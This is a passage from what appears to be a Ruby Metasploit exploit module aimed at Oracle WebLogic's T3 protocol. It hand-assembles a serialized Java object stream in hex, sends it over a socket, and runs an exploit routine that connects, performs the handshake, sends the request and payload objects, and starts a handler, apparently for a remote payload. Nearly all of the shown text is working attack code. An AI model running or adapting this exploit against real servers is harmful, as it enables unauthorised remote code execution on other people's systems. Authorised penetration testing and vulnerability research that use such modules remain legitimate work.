    payload << unicast_dat

601


602
    payload << 'fe010000' # ----- separator -----

603


604
    # basic weblogic ImmutableServiceContext object (serialized)

605
    payload << 'aced0005'                                  # JSO v5 header

606
    payload << '73'                                        # object header

607
    payload << '72'                                        #   class

608
    payload << '00257765626c6f6769632e726a766d2e496d6d75'  #   Name: weblogic.rjvm.ImmutableServiceContext

609
    payload << '7461626c6553657276696365436f6e74657874'    #     (cont)

610
    payload << 'ddcba8706386f0ba'                          #   serialVersionUID

611
    payload << '0c'                                        #   EXTERNALIZABLE | BLOCKDATA

612
    payload << '0000'                                      #   fieldCount = 0

613
    payload << '78'                                        #   object footer

614
    payload << '72'                                        # block header

615


616
    payload << '00297765626c6f6769632e726d692e70726f76'    #   Name: weblogic.rmi.provider.BasicServiceContext

617
    payload << '696465722e426173696353657276696365436f'    #     (cont)

618
    payload << '6e74657874'                                #     (cont)

619
    payload << 'e4632236c5d4a71e'                          #   serialVersionUID

620
    payload << '0c'                                        #     EXTERNALIZABLE | BLOCKDATA

621
    payload << '0000'                                      #   fieldCount = 0

622
    payload << '7870'                                      #   block footer

623
    payload << '77'                                        # block header

624
    payload << '020600'                                    #   contents = 0x0600

625
    payload << '7372'                                      #   class descriptor

626
    payload << '00267765626c6f6769632e726d692e696e7465'    #     Name: weblogic.rmi.internal.MethodDescriptor

627
    payload << '726e616c2e4d6574686f644465736372697074'    #       (cont)

628
    payload << '6f72'                                      #       (cont)

629
    payload << '12485a828af7f67b'                          #     serialVersionUID

630
    payload << '0c'                                        #     EXTERNALIZABLE | BLOCKDATA

631
    payload << '0000'                                      #     fieldCount = 0

632
    payload << '7870'                                      #     class footer

633
    payload << '77'                                        #   class data

634


635
    # payload << '34002e61757468656e746963617465284c7765'    #     old contents = 0x002e61757468656e746963617465284c7765

636
    # payload << '626c6f6769632e73656375726974792e61636c'    #                    626c6f6769632e73656375726974792e61636c

637
    # payload << '2e55736572496e666f3b290000001b'            #                    2e55736572496e666f3b290000001b

638
    payload << rand_text_alphanumeric(52).unpack('H*')[0]  #   new = randomized

639
    payload << '78'                                        #     class footer

640
    payload << '78'                                        #   block footer

641
    # MISSING OBJECT FOOTER (0x78)

642


643
    payload << 'fe00ff' # this cruft again.  some kind of footer

644


645
    # sets the length of the stream

646
    data = ((payload.length >> 1) + 4).to_s(16).rjust(8, '0')

647
    data << payload

648


649
    sleep(2)

650
    sock.put([data].pack('H*'))

651
    sleep(2)

652
    sock.get_once

653
  end

654


655
  def exploit

656
    @met_sent = []

657
    gen_resp

658


659
    connect

660


661
    print_status('Sending handshake...')

662
    t3_handshake

663


664
    print_status('Sending T3 request object...')

665
    build_t3_request_object

666


667
    start_service

668


669
    print_status('Sending client object payload...')

670
    send_payload_objdata

671


672
    handler

673


674
    disconnect

675
  end

676
end

677


678